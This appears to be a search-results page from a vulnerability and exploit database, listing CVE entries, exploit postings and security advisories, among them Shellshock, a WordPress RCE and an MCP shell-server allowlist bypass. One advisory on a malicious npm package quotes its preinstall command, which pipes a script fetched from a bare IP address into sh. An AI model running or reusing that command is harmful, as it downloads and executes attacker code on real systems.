Lucene search
+L

3053 matches found

Kitploit
Kitploit
added 2026/09/08 5:38 p.m.9 views

CVE-2014-6271

CVE-2014-6271 A vulnerability known as "ShellShock" exists in GNU Bash through 4.3 due to how it processes trailing strings in the values of environment variables after function definitions. This vulnerability enables remote attackers to execute arbitrary code by crafting the environment in certa...

10CVSS8.2AI score0.99999EPSS
SaveExploits146
Kitploit
Kitploit
added 2026/09/08 4:07 p.m.5 views

CVE-2022-1388

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage root@kitploit: bash / | | | || | / | |/ / \ / | | || || | | / /| | | || | ' / /'| |/' |' / /'' / /'| | / / \ V / \ V / | | | | | || ||| / / | /| | / / / / ||| | \ \ / \ / \ | /\ / /| | ./ /\ |/ /./ /./ / | |./ /| || ||...

9.8CVSS8.5AI score0.99958EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/08 3:27 p.m.8 views

CVE-2026-10795

CVE-2026-10795 Donate...

8.1CVSS0.03578EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/08 12:23 a.m.3 views

wp2shell-scan

wp2shell-scan Detect and clean upwp2shell CVE‑2026‑63030 compromise across one or many WordPress sites. wp2shell is the pre‑authentication remote‑code‑execution vulnerability fixed in WordPress 7.0.2 / 6.9.5 / 6.8.6 2026‑07‑17. A public PoC appeared within a day and mass‑exploitation followed...

9.8CVSS8.1AI score0.97271EPSS
SaveExploits77References2
Kitploit
Kitploit
added 2026/09/02 1:59 a.m.6 views

firmwalker

firmwalker Простой bash-скрипт для поиска в извлеченной или смонтированной файловой системе прошивки. Он будет искать в извлеченной или смонтированной файловой системе прошивки интересующие элементы, такие как: etc/shadow и etc/passwd список каталога etc/ssl поиск файлов, связанных с SSL, таких к...

5.9AI score
SaveExploits0
NVD
NVD
added 2026/09/02 1:17 a.m.5 views

CVE-2026-84427

A vulnerability was determined in zhayujie CowAgent up to 2.1.7. Affected is an unknown function of the file agent/tools/bash/bash.py of the component Bash Tool. Executing a manipulation can lead to denial of service. The attack can be launched remotely. The exploit has been publicly disclosed an...

5.3CVSS0.00271EPSS
SaveExploits0References5
Cvelist
Cvelist
added 2026/09/02 12:30 a.m.41 views

CVE-2026-84427 zhayujie CowAgent Bash Tool bash.py denial of service

A vulnerability was determined in zhayujie CowAgent up to 2.1.7. Affected is an unknown function of the file agent/tools/bash/bash.py of the component Bash Tool. Executing a manipulation can lead to denial of service. The attack can be launched remotely. The exploit has been publicly disclosed an...

5.3CVSS0.00271EPSS
SaveExploits0References5
CVE
CVE
added 2026/09/02 12:30 a.m.12 views

CVE-2026-84427

CVE-2026-84427 affects zhayujie CowAgent versions up to 2.1.7 . The vulnerability resides in the Bash Tool component, specifically in the file agent/tools/bash/bash.py. The root-cause function is not precisely identified in the CVE description, though a linked GitHub report title references an ou...

5.3CVSS5.5AI score0.00271EPSS
SaveExploits0References5
EUVD
EUVD
added 2026/09/02 12:30 a.m.8 views

EUVD-2026-69782

A vulnerability was determined in zhayujie CowAgent up to 2.1.7. Affected is an unknown function of the file agent/tools/bash/bash.py of the component Bash Tool. Executing a manipulation can lead to denial of service. The attack can be launched remotely. The exploit has been publicly disclosed an...

5.3CVSS5.5AI score0.00271EPSS
SaveExploits0References5
GithubExploit
GithubExploit
added 2026/09/01 6:15 a.m.46 views

Exploit for CVE-2026-82329

CVE-2026-82329 Donate Help maintain this p...

9.8CVSS6AI score0.07666EPSS
SaveExploits7
OSV
OSV
added 2026/08/28 11:02 p.m.36 views

MAL-2026-15509 Malicious code in grafeno-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5beb233fe40ca775519f2262a691a45445a9bda31c970d12aca3c584be4d32ad The package's package.json preinstall lifecycle hook uses childprocess to run curl -s 216.126.236.46/x.sh | sh, fetching a shell script from a bare I...

6.4AI score
SaveExploits0References1
GithubExploit
GithubExploit
added 2026/08/26 2:45 p.m.19 views

Exploit for CVE-2026-19914

cve-id Donate Help maintain this project...

6AI score0.00594EPSS
SaveExploits1
Github Security Blog
Github Security Blog
added 2026/08/25 3:41 p.m.11 views

mcp-shell has a Secure Mode Allowlist Bypass via Default `/bin/bash` Executable

Summary mcp-shell ships a default Docker configuration security.yaml that includes /bin/bash in the allowedexecutables allowlist. The command validator security.go only checks whether the first token of the supplied command matches an allowed executable; it does not inspect or reject shell...

8.4CVSS6.4AI score0.0034EPSS
SaveExploits0References5Affected Software1
Cvelist
Cvelist
added 2026/08/25 3:40 p.m.46 views

CVE-2026-55581 mcp-shell: Secure Mode Allowlist Bypass via Default `/bin/bash` Executable

mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowedexecutables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell...

8.4CVSS0.0034EPSS
SaveExploits0References4
EUVD
EUVD
added 2026/08/25 3:40 p.m.10 views

EUVD-2026-65549

mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowedexecutables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell...

8.4CVSS5.8AI score0.0034EPSS
SaveExploits0References4
GithubExploit
GithubExploit
added 2026/08/21 5:23 p.m.74 views

dsh2shell

dsh2shell Unauthenticated RCE PoC for expo...

5.7AI score
SaveExploits0
OSV
OSV
added 2026/08/20 12:09 p.m.4 views

ROOT-OS-DEBIAN-11-CVE-2022-3715 CVE-2022-3715 in bash - Patched by Root

Root has patched CVE-2022-3715 in the bash package for Root:Debian:11. Multiple fixed versions available...

7.8CVSS6.5AI score0.00356EPSS
SaveExploits1
Wolfi
Wolfi
added 2026/08/19 8:23 p.m.25 views

GHSA-FJ27-X67R-V4G5 vulnerabilities

Vulnerabilities for packages: busybox...

5.3AI score
SaveExploits0
OSV
OSV
added 2026/08/19 12:42 p.m.9 views

ROOT-OS-UBUNTU-2510-CVE-0000-0000 CVE-0000-0000 in bash - Patched by Root

Root has patched CVE-0000-0000 in the bash package for Root:Ubuntu:25.10. Multiple fixed versions available...

5.4AI score
SaveExploits0
OSV
OSV
added 2026/08/17 5:50 p.m.31 views

GHSA-FHGH-WQ4Q-R37X uniget CLI: Metadata signature verification only runs when UNIGET_IGNORE_METADATA_SIGNATURE is set

Summary The sigstore check on metadata.json is gated on the wrong side of the condition. LoadMetadata in internal/config/update.go:81 verifies the bundle only when UNIGETIGNOREMETADATASIGNATURE is non-empty, so in a normal run, where nobody sets that variable, the signature is never checked...

7.8CVSS5.8AI score
SaveExploits0References3
Rows per page
Query Builder